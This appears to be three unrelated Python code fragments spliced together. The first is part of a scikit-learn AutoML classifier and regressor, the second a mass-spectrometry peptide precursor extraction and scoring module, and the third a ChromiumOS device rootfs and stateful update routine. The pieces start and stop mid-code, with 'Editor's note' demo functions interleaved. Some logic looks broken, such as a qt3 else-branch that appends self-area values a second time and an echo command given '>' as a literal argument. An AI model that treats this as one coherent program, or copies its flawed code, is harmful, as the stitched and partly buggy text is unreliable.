elif save == True and f_format == 'excel':
preds.to_excel('preds.xlsx', sheet_name = 'preds')
else:
pass
return self.best_estimator_.predict(X)
def predict_proba(self, X, save=False, f_format='excel'):
'''
        Class probability prediction based on the trained AutoML model.
Args:
X - a data frame with test data
save - save prediction in local directory or not
f_format - format of data saving (if save = True): 'csv' or 'excel' (default)
Return:
the probabilities of classes.
'''
assert f_format in {'excel', 'csv'}
preds = pd.DataFrame(self.best_estimator_.predict_proba(X))
if save == True and f_format == 'csv':
preds.to_csv('preds.csv')
elif save == True and f_format == 'excel':
preds.to_excel('preds.xlsx', sheet_name = 'preds')
else:
pass
return self.best_estimator_.predict_proba(X)
def classification_report(self, X, y, labels=None, cmap='inferno',
save=False):
'''
Prediction classification report.
Args:
X - a data frame with predictors
y - predicted variable.
labels - a list of labels
cmap - color map
save - whether to save the output plot in local directory or not
Return:
plots
classification_report
'''
report = classification_report(y, self.best_estimator_.predict(X),
target_names = labels)
plot_confusion_matrix(self.best_estimator_, X, y,
display_labels = labels, cmap = cmap)
if save == True:
plt.savefig('Preds_Heatmap.png', dpi = 200)
plt.show()
return print(report)
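# Editor's note: a minimal usage sketch for AutoML_Classifier (not part of the
# original code). It assumes the module's scikit-learn/xgboost imports resolve
# in your environment; the small n_iter/cv values keep the random search quick
# and are for illustration only.
def _demo_automl_classifier():
    from sklearn.datasets import load_iris
    data = load_iris(as_frame=True)
    X, y = data.data, data.target
    model = AutoML_Classifier(n_iter=5, cv=3)
    model.fit(X, y)            # prints the selected algorithm
    return model.predict(X)    # numeric class predictions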
class AutoML_Regressor:
'''
AutoML algorithm for regression.
Args:
    scoring_func - the scoring metric to optimize (default = 'neg_mean_squared_error')
    n_iter - the number of parameter-search iterations (default = 50)
    random_state - the random seed (default = 0)
    cv - the number of cross-validation folds (default = 5).
    Set an algorithm flag (e.g. Lasso=False) to exclude it from the search.
'''
def __init__(self, scoring_func='neg_mean_squared_error',
n_iter=50, random_state=0, cv=5,
LinearRegression=True, Lasso=True,
Ridge=True, ElasticNet=True,
RandomForest=True, SVR=True,
GradientBoosting=True, XGB=True):
self.scoring_func = scoring_func
self.n_iter = n_iter
self.random_state = random_state
self.cv = cv
self.LinearRegression = LinearRegression
self.Lasso = Lasso
self.Ridge = Ridge
self.ElasticNet = ElasticNet
self.SVR = SVR
self.RandomForest = RandomForest
self.GradientBoosting = GradientBoosting
self.XGB = XGB
def fit(self, X, y):
'''
Args:
X - a data frame with predictors
y - predicted variable.
It selects an optimal machine learning algorithm and performs all
the data preprocessing necessary for this algorithm.
Return:
            None. The fitted object exposes the best_estimator_, best_pipeline
            (the best parameters found) and cv_results_ attributes.
'''
X_train = X
y_train = y
# All unique cat values
cat_val = []
cat_subset = X_train.select_dtypes(include = ['object', 'category', 'bool'])
for i in cat_subset.columns:
cat_val.append(list(cat_subset[i].dropna().unique()))
if len(cat_val) > 0:
print('The data has categorical predictors: {}'.format(cat_subset.columns))
# Preprocessing
cat_pipeline = Pipeline([('cleaner', SimpleImputer(strategy = 'most_frequent')),
('encoder', OneHotEncoder(sparse = False, categories = cat_val))])
num_pipeline = Pipeline([('cleaner', SimpleImputer()),
('scaler', StandardScaler())])
preprocessor = ColumnTransformer([
('numerical', num_pipeline, make_column_selector(dtype_exclude = ['object', 'category', 'bool'])),
('categorical', cat_pipeline, make_column_selector(dtype_include = ['object', 'category', 'bool']))
])
# Main pipeline
model_pipeline_steps = []
model_pipeline_steps.append(('preprocessor', preprocessor))
        model_pipeline_steps.append(('feature_selector', SelectKBest(f_regression, k = 'all')))  # score features against a continuous target
model_pipeline_steps.append(('estimator', LinearRegression()))
model_pipeline = Pipeline(model_pipeline_steps)
total_features = preprocessor.fit_transform(X_train).shape[1]
optimization_grid = []
# ALGORITHMS SELECTION
# Linear Regression
if self.LinearRegression == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [LinearRegression()],
})
# Lasso (L1)
if self.Lasso == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [Lasso(random_state = self.random_state)],
'estimator__alpha': np.arange(0.001, 1.01, 0.05),
})
# Ridge (L2)
if self.Ridge == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [Ridge(random_state = self.random_state)],
'estimator__alpha': np.arange(0.001, 1.01, 0.05),
})
# ElasticNet (L1+L2)
if self.ElasticNet == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [ElasticNet(random_state = self.random_state)],
'estimator__alpha': np.arange(0.001, 1.01, 0.05),
'estimator__l1_ratio': np.arange(0.0, 1.01, 0.2),
})
# SVR
if self.SVR == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean','median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [SVR()],
'estimator__C': np.concatenate([np.arange(0.1, 1.1, 0.1),
np.arange(10, 101, 10)]),
| |
import os
import os.path
import pickle
import numpy as np
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
import tensorflow as tf
from keras.models import load_model
from scipy.stats import pearsonr
import tools_cython as tools
from utils import *
from mz_calculator import calc_all_fragment_mzs
class Lib_frag:
def __init__(self, mz, charge, fragtype, series, intensity):
self.__mz = mz
self.__charge = charge
self.__fragtype = fragtype
self.__series = series
self.__intensity = intensity
def get_mz(self):
return self.__mz
def get_charge(self):
return self.__charge
def get_intensity(self):
return self.__intensity
def format_output(self):
return "{0}_{1}_{2}_{3}_{4}".format(self.__fragtype, self.__series, self.__charge, self.__mz, self.__intensity)
class Precursor:
def __init__(self, precursor_id, full_sequence, sequence, charge, precursor_mz, iRT, protein_name, decoy,
mz_min, mz_max, iso_range,
frag_mz_list, frag_charge_list, frag_type_list, frag_series_list, frag_intensity_list):
self.precursor_id = precursor_id
self.full_sequence = full_sequence
self.sequence = sequence
self.charge = charge
self.precursor_mz = precursor_mz
self.iRT = iRT
self.RT = None
self.protein_name = protein_name
self.decoy = decoy
self.precursor_win_id = None
self.ms1_areas = []
self.ms2_areas = []
# add
self.self_areas = []
self.self_pearsons = []
# add done
self.lib_frags_real_intensities = []
self.lib_pearsons = []
self.self_frags, self.self_frag_charges = np.array(calc_all_fragment_mzs(self.full_sequence,
self.charge,
(mz_min, mz_max),
return_charges = True))
iso_shift_max = int(min(iso_range, (mz_max - self.precursor_mz) * self.charge)) + 1
self.qt3_frags = [self.precursor_mz + iso_shift / self.charge for iso_shift in range(iso_shift_max)]
self.lib_frags = [Lib_frag(mz, charge, fragtype, series, inten) for mz, charge, fragtype, series, inten in zip(frag_mz_list, frag_charge_list, frag_type_list, frag_series_list, frag_intensity_list)]
self.iso_frags = self.filter_frags([i.get_mz() + 1 / i.get_charge() for i in self.lib_frags], mz_min, mz_max, padding = True)
self.light_frags = self.filter_frags([i.get_mz() - 1 / i.get_charge() for i in self.lib_frags], mz_min, mz_max, padding = True)
def filter_frags(self, frag_list, mz_min, mz_max, padding = False, padding_value = -1):
if padding:
return list(map(lambda x : x if (mz_min <= x < mz_max) else padding_value, frag_list))
return [i for i in frag_list if mz_min <= i < mz_max]
def set_RT(self, rt_norm_model, rt_model_params):
if rt_norm_model == "linear":
self.RT = self.iRT * rt_model_params[0] + rt_model_params[1]
else:
self.RT = np.poly1d(rt_model_params)(self.iRT)
def clear(self):
self.ms1_areas = []
self.ms2_areas = []
self.lib_frags_real_intensities = []
def __eq__(self, obj):
return (self.full_sequence == obj.full_sequence) and (self.charge == obj.charge)
def __str__(self):
return self.full_sequence + "_" + str(self.charge)
def __repr__(self):
return self.full_sequence + "_" + str(self.charge)
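# Editor's note: a standalone sketch (not part of the original module) of the
# iRT -> RT normalization applied by Precursor.set_RT above. For the "linear"
# model the parameters are (slope, intercept); for any other model they are
# polynomial coefficients in numpy.poly1d order (highest degree first). The
# parameter values below are made up.
def _demo_rt_normalization(irt=55.0):
    import numpy as np
    linear_rt = irt * 0.98 + 3.2                    # rt_norm_model == "linear"
    poly_rt = np.poly1d([1.2e-4, 0.95, 4.0])(irt)   # polynomial model
    return linear_rt, poly_rt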
def load_precursors(library, lib_cols, precursor_index, precursor_list, mz_min, mz_max, iso_range):
for idx in precursor_index:
library_part = library.iloc[idx, :]
precursor_obj = Precursor(list(library_part.loc[:, lib_cols["PRECURSOR_ID_COL"]])[0],
list(library_part.loc[:, lib_cols["FULL_SEQUENCE_COL"]])[0],
list(library_part.loc[:, lib_cols["PURE_SEQUENCE_COL"]])[0],
list(library_part.loc[:, lib_cols["PRECURSOR_CHARGE_COL"]])[0],
list(library_part.loc[:, lib_cols["PRECURSOR_MZ_COL"]])[0],
list(library_part.loc[:, lib_cols["IRT_COL"]])[0],
list(library_part.loc[:, lib_cols["PROTEIN_NAME_COL"]])[0],
list(library_part.loc[:, lib_cols["DECOY_OR_NOT_COL"]])[0],
mz_min, mz_max, iso_range,
list(library_part[lib_cols["FRAGMENT_MZ_COL"]]),
list(library_part[lib_cols["FRAGMENT_CHARGE_COL"]]),
list(library_part[lib_cols["FRAGMENT_TYPE_COL"]]),
list(library_part[lib_cols["FRAGMENT_SERIES_COL"]]),
list(library_part[lib_cols["LIB_INTENSITY_COL"]]))
precursor_list.append(precursor_obj)
def extract_precursors(ms1, ms2, win_range, precursor_list, matrix_queue,
n_cycles, model_cycles, mz_unit, mz_min, mz_max, mz_tol_ms1, mz_tol_ms2, iso_range,
n_lib_frags, n_self_frags, n_qt3_frags, n_ms1_frags, n_iso_frags, n_light_frags,
peak_index_range, rt_norm_model, rt_model_params, p_id):
# add
n_self_quant_frags = 3
# add done
peak_indice = get_peak_indice(model_cycles, peak_index_range)
feature_dimension = n_lib_frags * 3 + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags + n_light_frags
for idx, precursor in enumerate(precursor_list):
precursor.set_RT(rt_norm_model, rt_model_params)
precursor.precursor_win_id = calc_win_id(precursor.precursor_mz, win_range)
rt_pos_ms1 = find_rt_pos(precursor.RT, ms1.rt_list, n_cycles)
rt_pos_ms2 = find_rt_pos(precursor.RT, ms2[precursor.precursor_win_id].rt_list, n_cycles)
precursor_rt_list = [ms1.rt_list[i] for i in rt_pos_ms1]
precursor_ms1_spectra = [ms1.spectra[i] for i in rt_pos_ms1]
precursor_ms2_spectra = [ms2[precursor.precursor_win_id].spectra[i] for i in rt_pos_ms2]
lib_frags = [frag.get_mz() for frag in precursor.lib_frags]
all_lib_xics = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, mz_tol_ms2) for frag in lib_frags])
all_lib_xics_1 = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, 0.2 * mz_tol_ms2) for frag in lib_frags])
all_lib_xics_2 = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, 0.45 * mz_tol_ms2) for frag in lib_frags])
all_iso_xics = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, mz_tol_ms2) for frag in precursor.iso_frags])
all_light_xics = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, mz_tol_ms2) for frag in precursor.light_frags])
all_self_xics = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, mz_tol_ms2) for frag in precursor.self_frags])
all_qt3_xics = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, mz_tol_ms2) for frag in precursor.qt3_frags])
all_ms1_xics = [calc_XIC(precursor_ms1_spectra, precursor.precursor_mz, mz_unit, mz_tol_ms1),
calc_XIC(precursor_ms1_spectra, precursor.precursor_mz, mz_unit, 0.2 * mz_tol_ms1),
calc_XIC(precursor_ms1_spectra, precursor.precursor_mz, mz_unit, 0.45 * mz_tol_ms1)]
ms1_iso_frags = [precursor.precursor_mz - 1 / precursor.charge] + [precursor.precursor_mz + iso_shift / precursor.charge for iso_shift in range(1, iso_range + 1)]
ms1_iso_frags = [i for i in ms1_iso_frags if mz_min <= i < mz_max]
all_ms1_xics.extend([calc_XIC(precursor_ms1_spectra, frag, mz_unit, mz_tol_ms1) for frag in ms1_iso_frags])
all_ms1_xics = np.array(all_ms1_xics)
orig_matrices, matrices, middle_rts, rt_lists = [], [], [], []
for rt_start in range(n_cycles - model_cycles + 1):
rt_end = rt_start + model_cycles
precursor_rt_list_part = precursor_rt_list[rt_start : rt_end]
middle_rts.append(precursor_rt_list_part[model_cycles // 2])
rt_lists.append(precursor_rt_list_part)
lib_xics = all_lib_xics[:, rt_start : rt_end]
lib_xics_1 = all_lib_xics_1[:, rt_start : rt_end]
lib_xics_2 = all_lib_xics_2[:, rt_start : rt_end]
self_xics = all_self_xics[:, rt_start : rt_end]
qt3_xics = all_qt3_xics[:, rt_start : rt_end]
ms1_xics = all_ms1_xics[:, rt_start : rt_end]
iso_xics = all_iso_xics[:, rt_start : rt_end]
light_xics = all_light_xics[:, rt_start : rt_end]
self_xics = filter_matrix(self_xics)
qt3_xics = filter_matrix(qt3_xics)
lib_xics = tools.smooth_array(lib_xics.astype(float))
lib_xics_1 = tools.smooth_array(lib_xics_1.astype(float))
lib_xics_2 = tools.smooth_array(lib_xics_2.astype(float))
self_xics = tools.smooth_array(self_xics.astype(float))
qt3_xics = tools.smooth_array(qt3_xics.astype(float))
ms1_xics = tools.smooth_array(ms1_xics.astype(float))
iso_xics = tools.smooth_array(iso_xics.astype(float))
light_xics = tools.smooth_array(light_xics.astype(float))
precursor_rt_list_part_diff = np.array(precursor_rt_list_part[1:]) - np.array(precursor_rt_list_part[:-1])
ms2_areas = [tools.calc_area(lib_xics[i, :], precursor_rt_list_part_diff) for i in range(lib_xics.shape[0])]
ms1_area = tools.calc_area(ms1_xics[0, :], precursor_rt_list_part_diff)
precursor.ms2_areas.append("|".join([str(each) for each in ms2_areas]))
precursor.ms1_areas.append(str(ms1_area))
peak_intensities = lib_xics[:, peak_indice].mean(axis = 1)
precursor.lib_frags_real_intensities.append(peak_intensities)
std_indice, pearson_sums = calc_pearson_sums(lib_xics)
precursor.lib_pearsons.append(pearson_sums)
if lib_xics.shape[0] > 0:
std_indice, pearson_sums = calc_pearson_sums(lib_xics)
sort_order = np.argsort(-np.array(pearson_sums))
lib_xics = lib_xics[sort_order, :]
lib_xics_1 = lib_xics_1[sort_order, :]
lib_xics_2 = lib_xics_2[sort_order, :]
iso_xics = iso_xics[sort_order, :]
light_xics = light_xics[sort_order, :]
if self_xics.shape[0] > 1 and len(std_indice) >= 1:
self_pearson = np.array([tools.calc_pearson(self_xics[i, :], lib_xics[0, :]) for i in range(self_xics.shape[0])])
self_xics = self_xics[np.argsort(-self_pearson), :]
# add
self_areas = pad_list_with_zeros([tools.calc_area(self_xics[i, :], precursor_rt_list_part_diff) for i in range(self_xics.shape[0])], n_self_quant_frags)
self_pearsons = pad_list_with_zeros(list(self_pearson), n_self_quant_frags)
precursor.self_areas.append("|".join([str(each) for each in self_areas]))
precursor.self_pearsons.append("|".join([str(each) for each in self_pearsons]))
# add done
# add
else:
precursor.self_areas.append("|".join(["0"] * n_self_quant_frags))
precursor.self_pearsons.append("|".join(["0"] * n_self_quant_frags))
# add done
if qt3_xics.shape[0] > 1 and len(std_indice) >= 1:
qt3_pearson = np.array([tools.calc_pearson(qt3_xics[i, :], lib_xics[0, :]) for i in range(qt3_xics.shape[0])])
qt3_xics = qt3_xics[np.argsort(-qt3_pearson), :]
# add
else:
precursor.self_areas.append("|".join(["0"] * n_self_quant_frags))
precursor.self_pearsons.append("|".join(["0"] * n_self_quant_frags))
lib_matrix = adjust_size(lib_xics, n_lib_frags)
lib_matrix_1 = adjust_size(lib_xics_1, n_lib_frags)
lib_matrix_2 = adjust_size(lib_xics_2, n_lib_frags)
self_matrix = adjust_size(self_xics, n_self_frags)
qt3_matrix = adjust_size(qt3_xics, n_qt3_frags)
ms1_matrix = adjust_size(ms1_xics, n_ms1_frags)
iso_matrix = adjust_size(iso_xics, n_iso_frags)
light_matrix = adjust_size(light_xics, n_light_frags)
training_matrix = np.zeros((feature_dimension, model_cycles))
if lib_matrix.shape[1] != model_cycles:
lib_matrix = adjust_cycle(lib_matrix, model_cycles)
if self_matrix.shape[1] != model_cycles:
self_matrix = adjust_cycle(self_matrix, model_cycles)
if qt3_matrix.shape[1] != model_cycles:
qt3_matrix = adjust_cycle(qt3_matrix, model_cycles)
if ms1_matrix.shape[1] != model_cycles:
ms1_matrix = adjust_cycle(ms1_matrix, model_cycles)
if iso_matrix.shape[1] != model_cycles:
iso_matrix = adjust_cycle(iso_matrix, model_cycles)
if light_matrix.shape[1] != model_cycles:
light_matrix = adjust_cycle(light_matrix, model_cycles)
if lib_matrix_1.shape[1] != model_cycles:
lib_matrix_1 = adjust_cycle(lib_matrix_1, model_cycles)
if lib_matrix_2.shape[1] != model_cycles:
lib_matrix_2 = adjust_cycle(lib_matrix_2, model_cycles)
part1_indice = (0,
lib_matrix.shape[0])
part2_indice = (n_lib_frags,
n_lib_frags + self_matrix.shape[0])
part3_indice = (n_lib_frags + n_self_frags,
n_lib_frags + n_self_frags + qt3_matrix.shape[0])
part4_indice = (n_lib_frags + n_self_frags + n_qt3_frags,
n_lib_frags + n_self_frags + n_qt3_frags + ms1_matrix.shape[0])
part5_indice = (n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags,
n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + iso_matrix.shape[0])
part6_indice = (n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags,
n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags + light_matrix.shape[0])
part7_indice = (n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags + n_light_frags,
n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags + n_light_frags + lib_matrix_1.shape[0])
part8_indice = (n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags + n_light_frags + n_lib_frags,
n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags + n_light_frags + n_lib_frags + lib_matrix_2.shape[0])
training_matrix[part1_indice[0] : part1_indice[1], :] = lib_matrix
training_matrix[part2_indice[0] : part2_indice[1], :] = self_matrix
training_matrix[part3_indice[0] : part3_indice[1], :] = qt3_matrix
training_matrix[part4_indice[0] : part4_indice[1], :] = ms1_matrix
training_matrix[part5_indice[0] : part5_indice[1], :] = iso_matrix
training_matrix[part6_indice[0] : part6_indice[1], :] = light_matrix
training_matrix[part7_indice[0] : part7_indice[1], :] = lib_matrix_1
training_matrix[part8_indice[0] : part8_indice[1], :] = lib_matrix_2
training_matrix = training_matrix.T
orig_matrices.append(training_matrix)
training_matrix = MinMaxScaler().fit_transform(training_matrix)
matrices.append(training_matrix)
matrix_queue.put([precursor, orig_matrices, matrices, middle_rts, rt_lists])
matrix_queue.put(None)
def score_batch(matrix_queue, lib_cols, BM_model_file, RM_model_file, out_file, rawdata_file, top_k, n_threads, batch_size, n_total_precursors, logger, out_chrom, rt_norm_dir):
BM_model = load_model(BM_model_file, compile = False)
RM_model = load_model(RM_model_file, compile = False)
BM_model.call = tf.function(BM_model.call, experimental_relax_shapes = True)
RM_model.call = tf.function(RM_model.call, experimental_relax_shapes = True)
if out_chrom:
chrom_dir = os.path.join(rt_norm_dir, "chrom")
if not os.path.exists(chrom_dir):
os.mkdir(chrom_dir)
out_head_1 = "%s\tfilename\tRT\t%s\t%s\t" % (lib_cols["PRECURSOR_ID_COL"], lib_cols["PURE_SEQUENCE_COL"], lib_cols["FULL_SEQUENCE_COL"])
out_head_2 = "%s\t%s\t%s\t%s\tassay_rt\tdelta_rt\t" % (lib_cols["PRECURSOR_CHARGE_COL"], lib_cols["PRECURSOR_MZ_COL"], lib_cols["PROTEIN_NAME_COL"], lib_cols["DECOY_OR_NOT_COL"])
out_head_3 = "%s\tnr_peaks\treal_intensities\tlib_cos_scores\t" % lib_cols["IRT_COL"]
out_head_4 = "dream_scores\tms1_area\tms2_areas\tself_areas\tself_pearsons\taggr_Fragment_Annotation\tlib_pearsons\tdrf_scores\n"
| |
the rootfs partition of the device."""
logging.info('Updating rootfs partition')
devserver_bin = os.path.join(self.device_dev_dir,
self.REMOTE_DEVSERVER_FILENAME)
ds = ds_wrapper.RemoteDevServerWrapper(
self.device, devserver_bin, self.is_au_endtoendtest,
static_dir=self.device_static_dir,
log_dir=self.device.work_dir)
try:
ds.Start()
logging.debug('Successfully started devserver on the device on port '
'%d.', ds.port)
# Use the localhost IP address to ensure that update engine
# client can connect to the devserver.
omaha_url = ds.GetDevServerURL(
ip='127.0.0.1', port=ds.port, sub_dir='update/pregenerated')
cmd = [self.REMOTE_UPDATE_ENGINE_BIN_FILENAME, '-check_for_update',
'-omaha_url=%s' % omaha_url]
self._StartPerformanceMonitoringForAUTest()
self.device.RunCommand(cmd, **self._cmd_kwargs)
# If we are using a progress bar, update it every 0.5s instead of 10s.
if command.UseProgressBar():
update_check_interval = self.UPDATE_CHECK_INTERVAL_PROGRESSBAR
oper = operation.ProgressBarOperation()
else:
update_check_interval = self.UPDATE_CHECK_INTERVAL_NORMAL
oper = None
end_message_not_printed = True
# Loop until update is complete.
while True:
#TODO(dhaddock): Remove retry when M61 is stable. See crbug.com/744212.
op, progress = retry_util.RetryException(cros_build_lib.RunCommandError,
UPDATE_ENGINE_STATUS_RETRY,
self.GetUpdateStatus,
self.device,
['CURRENT_OP', 'PROGRESS'],
delay_sec=DELAY_SEC_FOR_RETRY)
logging.info('Waiting for update...status: %s at progress %s',
op, progress)
if op == UPDATE_STATUS_UPDATED_NEED_REBOOT:
logging.notice('Update completed.')
break
if op == UPDATE_STATUS_IDLE:
raise RootfsUpdateError(
'Update failed with unexpected update status: %s' % op)
if oper is not None:
if op == UPDATE_STATUS_DOWNLOADING:
oper.ProgressBar(float(progress))
elif end_message_not_printed and op == UPDATE_STATUS_FINALIZING:
oper.Cleanup()
logging.notice('Finalizing image.')
end_message_not_printed = False
time.sleep(update_check_interval)
# Write the hostlog to a file before shutting off devserver.
self._CollectDevServerHostLog(ds)
ds.Stop()
except Exception as e:
logging.error('Rootfs update failed.')
self.RevertBootPartition()
logging.warning(ds.TailLog() or 'No devserver log is available.')
error_msg = 'Failed to perform rootfs update: %r'
raise RootfsUpdateError(error_msg % e)
finally:
if ds.is_alive():
self._CollectDevServerHostLog(ds)
ds.Stop()
self.device.CopyFromDevice(
ds.log_file,
os.path.join(self.tempdir, self.LOCAL_DEVSERVER_LOG_FILENAME),
**self._cmd_kwargs_omit_error)
self.device.CopyFromDevice(
self.REMOTE_UPDATE_ENGINE_LOGFILE_PATH,
os.path.join(self.tempdir, os.path.basename(
self.REMOTE_UPDATE_ENGINE_LOGFILE_PATH)),
follow_symlinks=True,
**self._cmd_kwargs_omit_error)
self.device.CopyFromDevice(
self.REMOTE_QUICK_PROVISION_LOGFILE_PATH,
os.path.join(self.tempdir, os.path.basename(
self.REMOTE_QUICK_PROVISION_LOGFILE_PATH)),
follow_symlinks=True,
ignore_failures=True,
**self._cmd_kwargs_omit_error)
self._CopyHostLogFromDevice('rootfs')
self._StopPerformanceMonitoringForAUTest()
def UpdateStateful(self, use_original_build=False):
"""Update the stateful partition of the device.
Args:
      use_original_build: If True, use the stateful.tgz from the original build
        for the stateful update. Defaults to False.
"""
msg = 'Updating stateful partition'
if self.original_payload_dir and use_original_build:
payload_dir = self.device_restore_dir
else:
payload_dir = self.device.work_dir
cmd = ['sh',
self.stateful_update_bin,
os.path.join(payload_dir, ds_wrapper.STATEFUL_FILENAME)]
if self._clobber_stateful:
cmd.append('--stateful_change=clean')
msg += ' with clobber enabled'
logging.info('%s...', msg)
try:
self.device.RunCommand(cmd, **self._cmd_kwargs)
except cros_build_lib.RunCommandError as e:
logging.error('Stateful update failed.')
self.ResetStatefulPartition()
error_msg = 'Failed to perform stateful partition update: %s'
raise StatefulUpdateError(error_msg % e)
def RunUpdateRootfs(self):
"""Run all processes needed by updating rootfs.
1. Check device's status to make sure it can be updated.
2. Copy files to remote device needed for rootfs update.
3. Do root updating.
TODO(ihf): Change this to:
2. Unpack rootfs here on server.
3. rsync from server rootfs to device rootfs to perform update
(do not use --compress).
"""
self.SetupRootfsUpdate()
# Copy payload for rootfs update.
self.TransferRootfsUpdate()
self.UpdateRootfs()
def RunUpdateStateful(self):
"""Run all processes needed by updating stateful.
1. Copy files to remote device needed by stateful update.
2. Do stateful update.
TODO(ihf): Change this to:
1. Unpack stateful here on server.
2. rsync from server stateful to device stateful to update (do not
use --compress).
"""
self.TransferStatefulUpdate()
self.UpdateStateful()
def RebootAndVerify(self):
"""Reboot and verify the remote device.
1. Reboot the remote device. If _clobber_stateful (--clobber-stateful)
is executed, the stateful partition is wiped, and the working directory
on the remote device no longer exists. So, recreate the working directory
for this remote device.
    2. Verify the remote device by checking whether the root device changed
    after the reboot.
"""
logging.notice('rebooting device...')
# Record the current root device. This must be done after SetupRootfsUpdate
# and before reboot, since SetupRootfsUpdate may reboot the device if there
# is a pending update, which changes the root device, and reboot will
# definitely change the root device if update successfully finishes.
old_root_dev = self.GetRootDev(self.device)
self.device.Reboot()
if self._clobber_stateful:
self.device.BaseRunCommand(['mkdir', '-p', self.device.work_dir])
if self._do_rootfs_update:
logging.notice('Verifying that the device has been updated...')
new_root_dev = self.GetRootDev(self.device)
if old_root_dev is None:
raise AutoUpdateVerifyError(
'Failed to locate root device before update.')
if new_root_dev is None:
raise AutoUpdateVerifyError(
'Failed to locate root device after update.')
if new_root_dev == old_root_dev:
raise AutoUpdateVerifyError(
'Failed to boot into the new version. Possibly there was a '
'signing problem, or an automated rollback occurred because '
'your new image failed to boot.')
def RunUpdate(self):
"""Update the device with image of specific version."""
self.TransferDevServerPackage()
restore_stateful = self.CheckRestoreStateful()
if restore_stateful:
self.RestoreStateful()
# Perform device updates.
if self._do_rootfs_update:
self.RunUpdateRootfs()
logging.info('Rootfs update completed.')
if self._do_stateful_update and not restore_stateful:
self.RunUpdateStateful()
logging.info('Stateful update completed.')
if self._reboot:
self.RebootAndVerify()
if self._disable_verification:
logging.info('Disabling rootfs verification on the device...')
self.device.DisableRootfsVerification()
def _CollectDevServerHostLog(self, devserver):
"""Write the host_log events from the remote DUTs devserver to a file.
The hostlog is needed for analysis by autoupdate_EndToEndTest only.
We retry several times as some DUTs are slow immediately after
starting up a devserver and return no hostlog on the first call(s).
Args:
devserver: The remote devserver wrapper for the running devserver.
"""
if not self.is_au_endtoendtest:
return
for _ in range(0, MAX_RETRY):
try:
host_log_url = devserver.GetDevServerHostLogURL(ip='127.0.0.1',
port=devserver.port,
host='127.0.0.1')
# Save the hostlog.
self.device.RunCommand(['curl', host_log_url, '-o',
self.REMOTE_HOSTLOG_FILE_PATH],
**self._cmd_kwargs)
# Copy it back.
tmphostlog = os.path.join(self.tempdir, 'hostlog')
self.device.CopyFromDevice(self.REMOTE_HOSTLOG_FILE_PATH, tmphostlog,
**self._cmd_kwargs_omit_error)
# Check that it is not empty.
with open(tmphostlog, 'r') as out_log:
hostlog_data = json.loads(out_log.read())
if not hostlog_data:
logging.info('Hostlog empty. Trying again...')
time.sleep(DELAY_SEC_FOR_RETRY)
else:
break
except cros_build_lib.RunCommandError as e:
logging.debug('Exception raised while trying to write the hostlog: '
'%s', e)
def _StartPerformanceMonitoringForAUTest(self):
"""Start update_engine performance monitoring script in rootfs update.
This script is used by autoupdate_EndToEndTest.
"""
if self._clobber_stateful or not self.is_au_endtoendtest:
return None
cmd = ['python', self.REMOTE_UPDATE_ENGINE_PERF_SCRIPT_PATH, '--start-bg']
try:
perf_id = self.device.RunCommand(cmd).output.strip()
logging.info('update_engine_performance_monitors pid is %s.', perf_id)
self.perf_id = perf_id
except cros_build_lib.RunCommandError as e:
logging.debug('Could not start performance monitoring script: %s', e)
def _StopPerformanceMonitoringForAUTest(self):
"""Stop the performance monitoring script and save results to file."""
if self.perf_id is None:
return
cmd = ['python', self.REMOTE_UPDATE_ENGINE_PERF_SCRIPT_PATH, '--stop-bg',
self.perf_id]
try:
perf_json_data = self.device.RunCommand(cmd).output.strip()
self.device.RunCommand(['echo', json.dumps(perf_json_data), '>',
self.REMOTE_UPDATE_ENGINE_PERF_RESULTS_PATH])
except cros_build_lib.RunCommandError as e:
logging.debug('Could not stop performance monitoring process: %s', e)
def _CopyHostLogFromDevice(self, partial_filename):
"""Copy the hostlog file generated by the devserver from the device."""
if self.is_au_endtoendtest:
self.device.CopyFromDevice(
self.REMOTE_HOSTLOG_FILE_PATH,
os.path.join(self.tempdir, '_'.join([os.path.basename(
self.REMOTE_HOSTLOG_FILE_PATH), partial_filename])),
**self._cmd_kwargs_omit_error)
def _Reboot(self, error_stage):
try:
self.device.Reboot(timeout_sec=self.REBOOT_TIMEOUT)
except cros_build_lib.DieSystemExit:
raise ChromiumOSUpdateError('%s cannot recover from reboot at %s' % (
self.device.hostname, error_stage))
except remote_access.SSHConnectionError:
raise ChromiumOSUpdateError('Failed to connect to %s at %s' % (
self.device.hostname, error_stage))
class ChromiumOSUpdater(ChromiumOSFlashUpdater):
